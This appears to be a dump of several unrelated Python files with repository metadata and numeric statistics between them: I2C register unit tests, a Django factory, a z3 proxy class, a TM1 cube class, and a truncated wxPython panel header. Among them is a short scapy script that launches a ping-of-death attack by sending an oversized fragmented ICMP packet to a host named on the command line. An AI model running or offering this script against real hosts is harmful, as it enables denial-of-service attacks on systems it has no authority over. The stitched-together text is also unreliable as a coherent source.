| 26.346154 | 73 | 0.731387 | 197 | 1,370 | 4.939086 | 0.360406 | 0.057554 | 0.086331 | 0.107914 | 0.405961 | 0.332991 | 0.300103 | 0.300103 | 0.176773 | 0.135663 | 0 | 0.007719 | 0.148905 | 1,370 | 51 | 74 | 26.862745 | 0.826758 | 0.237956 | 0 | 0.214286 | 1 | 0 | 0.215534 | 0.042718 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.035714 | false | 0.107143 | 0.214286 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f462c49130537a9d0e3cb05ac39fbb6607b6b15d | 7,575 | py | Python | py_i2c_register/test_register_list.py | hosa-io/py-i2c-register | f5e866b2837dfe98b3522c2c70a461f650a6cb95 | [
"MIT"
] | 3 | 2017-09-13T14:54:01.000Z | 2020-02-13T05:34:23.000Z | py_i2c_register/test_register_list.py | hosa-io/py-i2c-register | f5e866b2837dfe98b3522c2c70a461f650a6cb95 | [
"MIT"
] | 1 | 2017-04-02T04:10:10.000Z | 2017-04-04T03:54:49.000Z | py_i2c_register/test_register_list.py | hosa-io/py-i2c-register | f5e866b2837dfe98b3522c2c70a461f650a6cb95 | [
"MIT"
] | 2 | 2019-07-08T15:53:28.000Z | 2020-10-13T04:32:17.000Z | import unittest
from mock import MagicMock
from py_i2c_register.register_list import RegisterList
from py_i2c_register.register import Register
from py_i2c_register.register_segment import RegisterSegment
class TestRegisterListInit(unittest.TestCase):
def test_perfect(self):
i2c = MagicMock()
list = RegisterList(1, i2c, {"key": "value"})
self.assertEqual(list.dev_addr, 1)
self.assertEqual(list.i2c, i2c)
self.assertEqual(list.registers, {"key": "value"})
class TestRegisterListProxyMethods(unittest.TestCase):
def setUp(self):
self.i2c = MagicMock()
self.i2c.readBytes = MagicMock(return_value=[170])
self.i2c.writeBytes = MagicMock()
self.lst = RegisterList(1, self.i2c, {})
self.lst.add("REG1", 1, Register.READ + Register.WRITE, {})
self.lst.get("REG1").add("SEG1", 0, 2, [0] * 3)
def test_to_int_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_int = MagicMock()
self.lst.to_int("REG1", "SEG1", read_first=True)
self.lst.get("REG1").get("SEG1").bytes_to_int.assert_called_once()
self.i2c.readBytes.assert_called_once_with(1, 1, 1)
def test_to_int_dont_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_int = MagicMock()
self.lst.to_int("REG1", "SEG1", read_first=False)
self.lst.get("REG1").get("SEG1").bytes_to_int.assert_called_once()
self.i2c.readBytes.assert_not_called()
def test_to_int_keyerror_reg(self):
with self.assertRaises(KeyError):
self.lst.to_int("DOES_NOT_EXIST", "SEG1")
def test_to_int_keyerror_seg(self):
with self.assertRaises(KeyError):
self.lst.to_int("REG1", "DOES_NOT_EXIST")
def test_to_twos_comp_int_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int = MagicMock()
self.lst.to_twos_comp_int("REG1", "SEG1", read_first=True)
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int.assert_called_once()
self.i2c.readBytes.assert_called_once_with(1, 1, 1)
def test_to_twos_comp_int_dont_read_first(self):
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int = MagicMock()
self.lst.to_twos_comp_int("REG1", "SEG1", read_first=False)
self.lst.get("REG1").get("SEG1").bytes_to_twos_comp_int.assert_called_once()
self.i2c.readBytes.assert_not_called()
def test_to_twos_comp_int_keyerror_reg(self):
with self.assertRaises(KeyError):
self.lst.to_twos_comp_int("DOES_NOT_EXIST", "SEG1")
def test_to_twos_comp_int_keyerror_seg(self):
with self.assertRaises(KeyError):
self.lst.to_twos_comp_int("REG1", "DOES_NOT_EXIST")
def test_set_bits_perfect_write_after(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=True)
seg1.set_bits.assert_called_once_with([1, 1, 0])
self.i2c.writeBytes.assert_called_once_with(1, 1, [3])
def test_set_bits_perfect_dont_write_after(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=False)
seg1.set_bits.assert_called_once_with([1, 1, 0])
self.i2c.writeBytes.assert_not_called()
def test_set_bits_perfect_write_after_custom_write_fn(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
mock_write = MagicMock()
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=True, write_fn=mock_write)
seg1.set_bits.assert_called_once_with([1, 1, 0])
mock_write.assert_called_once_with("REG1")
def test_set_bits_perfect_dont_write_after_custom_write_fn(self):
seg1 = self.lst.get("REG1").get("SEG1")
seg1.set_bits = MagicMock(side_effect=seg1.set_bits)
mock_write = MagicMock()
self.lst.set_bits("REG1", "SEG1", [1, 1, 0], write_after=False, write_fn=mock_write)
seg1.set_bits.assert_called_once_with([1, 1, 0])
mock_write.assert_not_called()
def test_set_bits_from_int(self):
self.lst.set_bits = MagicMock()
mock_write = MagicMock()
self.lst.set_bits_from_int("REG1", "SEG1", 3, write_after=True, write_fn=mock_write)
self.lst.set_bits.assert_called_once_with("REG1", "SEG1", [1, 1, 0], write_after=True, write_fn=mock_write)
def test_read(self):
reg1 = self.lst.get("REG1")
reg1.read = MagicMock(side_effect=reg1.read)
self.lst.read("REG1")
reg1.read.assert_called_once_with(self.i2c)
self.assertEqual(self.lst.to_int("REG1", "SEG1"), 2)
def test_write(self):
reg1 = self.lst.get("REG1")
reg1.write = MagicMock(side_effect=reg1.write)
self.lst.set_bits("REG1", "SEG1", [1, 1, 0])
self.lst.write("REG1")
reg1.write.assert_called_once_with(self.i2c)
self.i2c.writeBytes.assert_called_once_with(1, 1, [3])
class TestRegisterListAdd(unittest.TestCase):
def setUp(self):
self.i2c = MagicMock()
self.lst = RegisterList(1, self.i2c, {})
def test_add_perfect(self):
self.lst.add("REG1", 1, "OP_MODE", {"key": "value"})
reg = self.lst.get("REG1")
self.assertEqual(reg.name, "REG1")
self.assertEqual(reg.dev_addr, 1)
self.assertEqual(reg.op_mode, "OP_MODE")
self.assertEqual(reg.segments, {"key": "value"})
def test_add_already_exists(self):
self.lst.add("REG1", 1, Register.READ, {})
with self.assertRaises(KeyError):
self.lst.add("REG1", 1, Register.READ, {})
class TestRegisterListGet(unittest.TestCase):
def setUp(self):
self.i2c = MagicMock()
self.i2c.readBytes = MagicMock(return_value=[213])
self.lst = RegisterList(1, self.i2c, {})
self.seg1 = RegisterSegment("SEG1", 0, 2, [0] * 3)
self.lst.add("REG1", 1, Register.READ, {"SEG1": self.seg1})
def test_perfect_read_first(self):
reg = self.lst.get("REG1", read_first=True)
self.assertEqual(reg.name, "REG1")
self.assertEqual(reg.dev_addr, 1)
self.assertEqual(reg.op_mode, Register.READ)
self.assertEqual(reg.segments["SEG1"], self.seg1)
self.i2c.readBytes.assert_called_once_with(1, 1, 1)
self.assertEqual(self.lst.get("REG1").get("SEG1").bits, [1, 0, 1])
def test_perfect_dont_read_first(self):
reg = self.lst.get("REG1", read_first=False)
self.assertEqual(reg.name, "REG1")
self.assertEqual(reg.dev_addr, 1)
self.assertEqual(reg.op_mode, Register.READ)
self.assertEqual(reg.segments["SEG1"], self.seg1)
self.i2c.readBytes.assert_not_called()
self.assertEqual(self.lst.get("REG1").get("SEG1").bits, [0, 0, 0])
def test_keyerror(self):
with self.assertRaises(KeyError):
self.lst.get("DOES_NOT_EXIST")
class TestRegisterListGenericMethods(unittest.TestCase):
def test_str(self):
i2c = MagicMock()
lst = RegisterList(1, i2c, {})
lst.add("REG1", 1, Register.READ, {})\
.add("SEG1", 0, 2, [0] * 3)
self.assertEqual(str(lst), "RegisterList<device_address=1, registers={\n REG1=Register<name=REG1, address=1, op_mode=READ, segments={\n SEG1=RegisterSegment<name=SEG1, lsb_i=0, msb_i=2, bits=[0, 0, 0]>\n }>\n}>")
| 37.132353 | 233 | 0.656238 | 1,083 | 7,575 | 4.336103 | 0.080332 | 0.07155 | 0.044719 | 0.059625 | 0.774276 | 0.742334 | 0.703578 | 0.589012 | 0.567717 | 0.519378 | 0 | 0.038436 | 0.196304 | 7,575 | 203 | 234 | 37.315271 | 0.732917 | 0 | 0 | 0.416667 | 0 | 0.006944 | 0.0833 | 0.011221 | 0 | 0 | 0 | 0 | 0.326389 | 1 | 0.173611 | false | 0 | 0.034722 | 0 | 0.243056 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
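The test suite above repeatedly wraps a real method in a `MagicMock` with `side_effect` pointing back at the original bound method, so the real behavior still runs while every call is recorded. A minimal self-contained sketch of that spy pattern (the `Counter` class here is illustrative, not part of the file above):

```python
from unittest.mock import MagicMock

class Counter:
    """Toy class standing in for Register/RegisterSegment."""
    def __init__(self):
        self.value = 0

    def increment(self, amount):
        self.value += amount
        return self.value

c = Counter()
# The right-hand side captures the real bound method before the attribute
# is replaced; calls go through the mock, which forwards to the original.
c.increment = MagicMock(side_effect=c.increment)

c.increment(3)
c.increment.assert_called_once_with(3)
print(c.value)  # 3 -- state was really updated by the wrapped method
```

This is why the tests can assert both on call counts (`assert_called_once_with`) and on the resulting register state in the same test.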
f46c75e02a21885e59602dfbe2b52ec915b45dcb | 324 | py | Python | kollect/factories/user.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | 18 | 2019-09-24T23:49:41.000Z | 2020-11-14T17:30:27.000Z | kollect/factories/user.py | dcramer/kollect | a8586ec07f671e01e80df2336ad1fa5dfe4804e5 | [
"Apache-2.0"
] | 53 | 2019-09-24T18:50:25.000Z | 2022-02-27T11:44:55.000Z | tabletop/factories/user.py | dcramer/tabletop-server | 062f56d149a29d5ab8605e220c156c1b4fb52d2f | [
"Apache-2.0"
] | 2 | 2020-02-03T08:22:36.000Z | 2021-02-28T12:55:48.000Z | import factory
from .. import models
class UserFactory(factory.django.DjangoModelFactory):
name = factory.Faker("name")
email = factory.LazyAttribute(
lambda x: "{0}@example.com".format(x.name.replace(" ", ".").lower()).lower()
)
password = "password"
class Meta:
model = models.User
| 21.6 | 84 | 0.638889 | 35 | 324 | 5.914286 | 0.685714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003906 | 0.209877 | 324 | 14 | 85 | 23.142857 | 0.804688 | 0 | 0 | 0 | 0 | 0 | 0.089506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.2 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
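The `LazyAttribute` above derives each user's email from the faked name at build time. A plain-Python sketch of just that derivation, outside of factory_boy:

```python
def derive_email(name: str) -> str:
    """Mirror of the LazyAttribute lambda: 'Jane Doe' -> 'jane.doe@example.com'."""
    return "{0}@example.com".format(name.replace(" ", ".").lower())

print(derive_email("Jane Doe"))  # jane.doe@example.com
```

Note that the original applies `.lower()` twice (once to the name, once to the full address); the outer call is redundant because the local part is already lowercased and the domain is a constant.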
f478930ba2e20cec94a71da79e66de67fb18298f | 10,768 | py | Python | deal_solver/_proxies/_proxy.py | orsinium-labs/deal-solver | 8983f783b4a069cfd70b44e526e7cb14c237796a | [
"MIT"
] | 8 | 2021-07-07T16:34:54.000Z | 2022-02-15T15:28:39.000Z | deal_solver/_proxies/_proxy.py | orsinium-labs/deal-solver | 8983f783b4a069cfd70b44e526e7cb14c237796a | [
"MIT"
] | null | null | null | deal_solver/_proxies/_proxy.py | orsinium-labs/deal-solver | 8983f783b4a069cfd70b44e526e7cb14c237796a | [
"MIT"
] | null | null | null | import operator
import typing
import z3
from .._exceptions import UnsupportedError
from ._methods import Methods
from ._type_factory import TypeFactory
if typing.TYPE_CHECKING:
from .._context import Context
from ._bool import BoolSort
from ._float import FloatSort, FPSort, RealSort
from ._int import IntSort
from ._str import StrSort
T = typing.TypeVar('T', bound='ProxySort')
class ProxySort:
module_name: str = 'builtins'
type_name: str
expr: z3.ExprRef
methods: 'Methods' = Methods()
@staticmethod
def make_empty_expr(sort):
raise NotImplementedError
def sort(self) -> z3.SortRef:
return self.expr.sort()
def __init__(self, expr) -> None:
raise NotImplementedError
@property
def factory(self) -> TypeFactory:
raise NotImplementedError
@classmethod
def var(cls, *, name: str, ctx: z3.Context) -> 'ProxySort':
raise NotImplementedError
@property
def is_real(self) -> bool:
return False
@property
def is_fp(self) -> bool:
return False
@methods.add(name='__getattr__')
def m_getattr(self, name: str, ctx: 'Context') -> 'ProxySort':
"""self.name
"""
method = self.methods.get(name)
if method is None:
msg = "'{}' object has no attribute '{}'"
msg = msg.format(self.type_name, name)
ctx.add_exception(AttributeError, msg)
return self
result = method.with_obj(self)
if result.prop:
return result.m_call(ctx=ctx)
return result
@methods.add(name='__bool__')
def m_bool(self, ctx: 'Context') -> 'BoolSort':
"""bool(self)
"""
from ._registry import types
return types.bool.val(True, ctx=ctx)
@methods.add(name='__abs__')
def m_abs(self, ctx: 'Context') -> 'ProxySort':
"""abs(self)
"""
msg = "bad operand type for abs(): '{}'".format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__int__')
def m_int(self, ctx: 'Context') -> 'IntSort':
"""int(self)
"""
raise UnsupportedError('cannot convert {} to int'.format(self.type_name))
@methods.add(name='__str__')
def m_str(self, ctx: 'Context') -> 'StrSort':
"""str(self)
"""
raise UnsupportedError('cannot convert {} to str'.format(self.type_name))
@methods.add(name='__float__')
def m_float(self, ctx: 'Context') -> 'FloatSort':
"""float(self)
"""
raise UnsupportedError('cannot convert {} to float'.format(self.type_name))
def m_real(self, ctx: 'Context') -> 'RealSort':
raise NotImplementedError
def m_fp(self, ctx: 'Context') -> 'FPSort':
raise NotImplementedError
@methods.add(name='__call__')
def m_call(self, *args, ctx: 'Context', **kwargs) -> 'ProxySort':
"""self(*args, **kwargs)
"""
msg = "'{}' object is not callable".format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__len__')
def m_len(self, ctx: 'Context') -> 'IntSort':
"""len(self)
"""
from ._registry import types
msg = "object of type '{}' has no len()".format(self.type_name)
ctx.add_exception(TypeError, msg)
return types.int.val(0, ctx=ctx)
@methods.add(name='__getitem__')
def m_getitem(self, item: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self[item]
"""
msg = "'{}' object is not subscriptable"
msg = msg.format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
def get_slice(self, start, stop, ctx: 'Context') -> 'ProxySort':
"""self[start:stop]
"""
msg = "'{}' object is not subscriptable"
msg = msg.format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__setitem__')
def m_setitem(self, key: 'ProxySort', value: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self[key] = value
"""
msg = "'{}' object does not support item assignment"
msg = msg.format(self.type_name)
ctx.add_exception(TypeError, msg)
return self
@methods.add(name='__contains__')
def m_contains(self, item, ctx: 'Context') -> 'BoolSort':
"""item in self
"""
from ._registry import types
msg = "argument of type '{}' is not iterable".format(self.type_name)
ctx.add_exception(TypeError, msg)
return types.bool.val(False, ctx=ctx)
def _binary_op(self, other: 'ProxySort', handler: typing.Callable, ctx: 'Context'):
return handler(self.expr, other.expr)
# comparison
def _comp_op(self, other: 'ProxySort', handler: typing.Callable, ctx: 'Context') -> 'BoolSort':
from ._bool import BoolSort
expr = self._binary_op(other=other, handler=handler, ctx=ctx)
return BoolSort(expr=expr)
@methods.add(name='__eq__')
def m_eq(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self == other
"""
return self._comp_op(other=other, handler=operator.__eq__, ctx=ctx)
@methods.add(name='__ne__')
def m_ne(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self != other
"""
from ._bool import BoolSort
expr = self.m_eq(other, ctx=ctx).expr
return BoolSort(expr=z3.Not(expr))
@methods.add(name='__lt__')
def m_lt(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self < other
"""
return self._comp_op(other=other, handler=operator.__lt__, ctx=ctx)
@methods.add(name='__le__')
def m_le(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self <= other
"""
return self._comp_op(other=other, handler=operator.__le__, ctx=ctx)
@methods.add(name='__gt__')
def m_gt(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self > other
"""
return self._comp_op(other=other, handler=operator.__gt__, ctx=ctx)
@methods.add(name='__ge__')
def m_ge(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self >= other
"""
return self._comp_op(other=other, handler=operator.__ge__, ctx=ctx)
@methods.add(name='in')
def m_in(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self in other
"""
return other.m_contains(self, ctx=ctx)
@methods.add(name='not in')
def m_not_in(self, other: 'ProxySort', ctx: 'Context') -> 'BoolSort':
"""self in other
"""
return other.m_contains(self, ctx=ctx).m_not(ctx=ctx)
# unary operations
@methods.add(name='__neg__')
def m_neg(self, ctx: 'Context') -> 'ProxySort':
"""-self
"""
cls = type(self)
return cls(expr=-self.expr)
@methods.add(name='__pos__')
def m_pos(self, ctx: 'Context') -> 'ProxySort':
"""+self
"""
cls = type(self)
return cls(expr=+self.expr)
@methods.add(name='__inv__')
def m_inv(self, ctx: 'Context') -> 'ProxySort':
"""~self
"""
return self._bad_un_op(op='~', ctx=ctx)
@methods.add(name='not')
def m_not(self, ctx: 'Context') -> 'BoolSort':
"""not self
"""
from ._bool import BoolSort
expr = self.m_bool(ctx=ctx).expr
return BoolSort(expr=z3.Not(expr, ctx=ctx.z3_ctx))
# math binary operations
@methods.add(name='__add__')
def m_add(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self + other
"""
return self._bad_bin_op(other, op='+', ctx=ctx)
@methods.add(name='__sub__')
def m_sub(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self - other
"""
return self._bad_bin_op(other, op='-', ctx=ctx)
@methods.add(name='__mul__')
def m_mul(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self * other
"""
return self._bad_bin_op(other, op='*', ctx=ctx)
@methods.add(name='__truediv__')
def m_truediv(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self / other
"""
return self._bad_bin_op(other, op='/', ctx=ctx)
@methods.add(name='__floordiv__')
def m_floordiv(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self // other
"""
return self._bad_bin_op(other, op='//', ctx=ctx)
@methods.add(name='__mod__')
def m_mod(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self % other
"""
return self._bad_bin_op(other, op='%', ctx=ctx)
@methods.add(name='__pow__')
def m_pow(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self ** other
"""
return self._bad_bin_op(other, op='** or pow()', ctx=ctx)
@methods.add(name='__matmul__')
def m_matmul(self, other: 'ProxySort', ctx: 'Context') -> 'ProxySort':
"""self @ other
"""
return self._bad_bin_op(other, op='@', ctx=ctx)
# bitwise binary operations
@methods.add(name='__and__')
def m_and(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self & other
"""
return self._bad_bin_op(other, op='&', ctx=ctx)
@methods.add(name='__or__')
def m_or(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self | other
"""
return self._bad_bin_op(other, op='|', ctx=ctx)
@methods.add(name='__xor__')
def m_xor(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self ^ other
"""
return self._bad_bin_op(other, op='^', ctx=ctx)
@methods.add(name='__lshift__')
def m_lshift(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self << other
"""
return self._bad_bin_op(other, op='<<', ctx=ctx)
@methods.add(name='__rshift__')
def m_rshift(self: T, other: 'ProxySort', ctx: 'Context') -> T:
"""self >> other
"""
return self._bad_bin_op(other, op='>>', ctx=ctx)
# helpers for error messages in operations
def _bad_bin_op(self: T, other: 'ProxySort', op: str, ctx: 'Context') -> T:
msg = "unsupported operand type(s) for {}: '{}' and '{}'"
msg = msg.format(op, self.type_name, other.type_name)
ctx.add_exception(TypeError, msg)
return self
def _bad_un_op(self: T, op: str, ctx: 'Context') -> T:
msg = "bad operand type for unary {}: '{}'"
msg = msg.format(op, self.type_name)
ctx.add_exception(TypeError, msg)
return self
| 31.211594 | 99 | 0.580052 | 1,298 | 10,768 | 4.570108 | 0.112481 | 0.072488 | 0.084963 | 0.084963 | 0.594235 | 0.531018 | 0.478085 | 0.450101 | 0.442515 | 0.412846 | 0 | 0.001003 | 0.258915 | 10,768 | 344 | 100 | 31.302326 | 0.742356 | 0.084974 | 0 | 0.207921 | 0 | 0 | 0.165477 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.247525 | false | 0 | 0.084158 | 0.019802 | 0.569307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
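`ProxySort` registers its operator handlers in a `Methods` registry via the `@methods.add(name=...)` decorator, which later lets `m_getattr` resolve attribute names to handlers. The `Methods` class itself is imported from elsewhere, so the sketch below is an assumption about its shape, not the actual deal-solver implementation — a minimal name-to-function registry that works as a decorator:

```python
class Methods:
    """Minimal sketch of a name -> function registry used as a decorator."""
    def __init__(self):
        self._table = {}

    def add(self, name):
        def decorator(func):
            self._table[name] = func
            return func  # leave the function usable as a normal attribute
        return decorator

    def get(self, name):
        return self._table.get(name)

methods = Methods()

@methods.add(name='__add__')
def m_add(self, other):
    return self + other

print(methods.get('__add__') is m_add)  # True
print(methods.get('__missing__'))       # None
```

Because the decorator returns the function unchanged, the class still has ordinary methods while the registry provides the by-name lookup used for dynamic dispatch and for the "object has no attribute" error path.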
f47b5737d51a0d7bdf070b88821dfed1bad5daac | 261 | py | Python | scapy/ping-of-death.py | Pranav-Balakumar/cybersec | f976bf9a18c0e903993aff6107f4e261c71674ac | [
"MIT"
] | 4 | 2020-05-22T13:31:15.000Z | 2020-11-11T22:05:45.000Z | scapy/ping-of-death.py | Pranav-Balakumar/cybersec | f976bf9a18c0e903993aff6107f4e261c71674ac | [
"MIT"
] | 1 | 2020-05-20T13:48:56.000Z | 2020-05-20T15:15:03.000Z | scapy/ping-of-death.py | Pranav-Balakumar/cybersec | f976bf9a18c0e903993aff6107f4e261c71674ac | [
"MIT"
] | 2 | 2020-05-20T07:28:53.000Z | 2020-05-22T13:15:30.000Z | from scapy.all import *
import sys
## Ping of death
def ping_of_death_attack():
host = sys.argv[1]
# https://en.wikipedia.org/wiki/Ping_of_death
send(fragment(IP(dst=host)/ICMP()/("X"*60000)))
if __name__ == "__main__":
ping_of_death_attack()
| 21.75 | 51 | 0.681992 | 41 | 261 | 3.95122 | 0.682927 | 0.148148 | 0.271605 | 0.209877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027273 | 0.157088 | 261 | 11 | 52 | 23.727273 | 0.709091 | 0.218391 | 0 | 0 | 0 | 0 | 0.045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
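The script above relies on scapy's `fragment()` to split the oversized ICMP packet into MTU-sized IP fragments. Assuming scapy's default fragment size of 1480 bytes and an 8-byte ICMP echo header (both assumptions about scapy's defaults, not stated in the script), the fragment count works out as:

```python
import math

# Assumptions: fragment() defaults to fragsize=1480 and splits the IP
# payload, which here is an 8-byte ICMP header plus 60000 data bytes.
icmp_header = 8
payload = 60000
fragsize = 1480

n_fragments = math.ceil((icmp_header + payload) / fragsize)
print(n_fragments)  # 41
```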
f48ad35edada7568ab5f4faec72105a6494d35f0 | 2,819 | py | Python | TM1py/Objects/Cube.py | ducklingasa/tm1py | 5860b53b480c521cc34928caec6064840b717696 | [
"MIT"
] | 19 | 2016-03-04T19:21:40.000Z | 2021-12-10T02:39:51.000Z | TM1py/Objects/Cube.py | ducklingasa/tm1py | 5860b53b480c521cc34928caec6064840b717696 | [
"MIT"
] | 11 | 2016-08-24T19:27:11.000Z | 2017-07-30T01:10:28.000Z | TM1py/Objects/Cube.py | ducklingasa/tm1py | 5860b53b480c521cc34928caec6064840b717696 | [
"MIT"
] | 6 | 2016-08-03T19:28:45.000Z | 2017-01-30T12:25:05.000Z | # -*- coding: utf-8 -*-
import collections
import json
from TM1py.Objects.Rules import Rules
from TM1py.Objects.TM1Object import TM1Object
class Cube(TM1Object):
""" Abstraction of a TM1 Cube
"""
def __init__(self, name, dimensions, rules=None):
"""
:param name: name of the Cube
:param dimensions: list of (existing) dimension names
:param rules: instance of TM1py.Objects.Rules
"""
self._name = name
self._dimensions = dimensions
self._rules = rules
@property
def name(self):
return self._name
@property
def dimensions(self):
return self._dimensions
@dimensions.setter
def dimensions(self, value):
self._dimensions = value
@property
def has_rules(self):
if self._rules:
return True
return False
@property
def rules(self):
return self._rules
@rules.setter
def rules(self, value):
self._rules = value
@property
def skipcheck(self):
if self.has_rules:
return self.rules.skipcheck
return False
@property
def undefvals(self):
if self.has_rules:
return self.rules.undefvals
return False
@property
def feedstrings(self):
if self.has_rules:
return self.rules.feedstrings
return False
@classmethod
def from_json(cls, cube_as_json):
""" Alternative constructor
:param cube_as_json: user as JSON string
:return: cube, an instance of this class
"""
cube_as_dict = json.loads(cube_as_json)
return cls.from_dict(cube_as_dict)
@classmethod
def from_dict(cls, cube_as_dict):
""" Alternative constructor
:param cube_as_dict: user as dict
:return: user, an instance of this class
"""
return cls(name=cube_as_dict['Name'],
dimensions=[dimension['Name'] for dimension in cube_as_dict['Dimensions']],
rules=Rules(cube_as_dict['Rules']) if cube_as_dict['Rules'] else None)
@property
def body(self):
return self._construct_body()
def _construct_body(self):
"""
construct body (json) from the class attributes
:return: String, TM1 JSON representation of a cube
"""
body_as_dict = collections.OrderedDict()
body_as_dict['Name'] = self.name
body_as_dict['Dimensions@odata.bind'] = ['Dimensions(\'{}\')'.format(dimension)
for dimension
in self.dimensions]
if self.rules:
body_as_dict['Rules'] = str(self.rules)
return json.dumps(body_as_dict, ensure_ascii=False)
| 26.345794 | 94 | 0.588507 | 321 | 2,819 | 4.990654 | 0.208723 | 0.052434 | 0.049938 | 0.041199 | 0.129213 | 0.061798 | 0.061798 | 0.061798 | 0 | 0 | 0 | 0.004712 | 0.322455 | 2,819 | 106 | 95 | 26.59434 | 0.834031 | 0.176658 | 0 | 0.261538 | 0 | 0 | 0.032674 | 0.009664 | 0 | 0 | 0 | 0 | 0 | 1 | 0.215385 | false | 0 | 0.061538 | 0.061538 | 0.523077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
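`_construct_body` above serializes the dimension names into OData binding strings before dumping the dict as JSON. A standalone sketch of that formatting step, using hypothetical cube and dimension names:

```python
import collections
import json

def construct_body(name, dimensions):
    """Sketch of the Dimensions@odata.bind serialization used by Cube."""
    body = collections.OrderedDict()
    body['Name'] = name
    body['Dimensions@odata.bind'] = [
        "Dimensions('{}')".format(d) for d in dimensions
    ]
    return json.dumps(body, ensure_ascii=False)

print(construct_body('Sales', ['Region', 'Product']))
# {"Name": "Sales", "Dimensions@odata.bind": ["Dimensions('Region')", "Dimensions('Product')"]}
```

The `OrderedDict` keeps `Name` first in the emitted JSON, matching the order the class builds its body in.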
be329495ef12ddff3970143f48186f8fde800bac | 5,683 | py | Python | sppas/sppas/src/ui/phoenix/windows/panel.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/ui/phoenix/windows/panel.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/ui/phoenix/windows/panel.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
"""
..
---------------------------------------------------------------------
___ __ __ __ ___
/ | \ | \ | \ / the automatic
\__ |__/ |__/ |___| \__ annotation and
\ | | | | \ analysis
